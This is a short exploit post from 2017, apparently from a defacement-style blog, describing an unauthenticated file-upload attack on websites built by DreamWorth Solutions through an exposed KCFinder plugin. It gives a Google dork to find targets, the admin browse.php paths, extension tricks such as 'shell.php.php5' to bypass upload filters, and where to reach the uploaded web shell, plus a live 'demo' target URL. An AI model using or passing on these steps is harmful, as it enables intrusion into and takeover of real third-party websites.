DreamWorth Solutions Kcfinder upload

Exploit title : DreamWorth Solutions Kcfinder upload
Author : Mr.Hydra
Google Dork : intext:"Powered by DreamWorth Solutions Pvt Ltd"
Tested on : Windows XP & Windows 7
Date : 2017-12-20
Vendor Hompage : https://www.dreamworth.in/

Tutor :
Dorking dork in google
Open Target
exploit targer for exploit : /admin/js/plugins/kcfinder-master/browse.php or /administrator/js/plugins/kcfinder-master/browse.php

Upload yoour shell with bypas ext shell.php.fla or shell.php.pjpg or shell.php.php5 or shell.PhP.black

acces your shell in :
/admin/js/plugins/kcfinder-master/upload/files/yourshell or /administrator/js/plugins/kcfinder-master/upload/files/yourshell

For demo : https://www.dreamworth.in/admin/js/plugins/kcfinder-master/browse.php
Previous
Next Post »
0 Komentar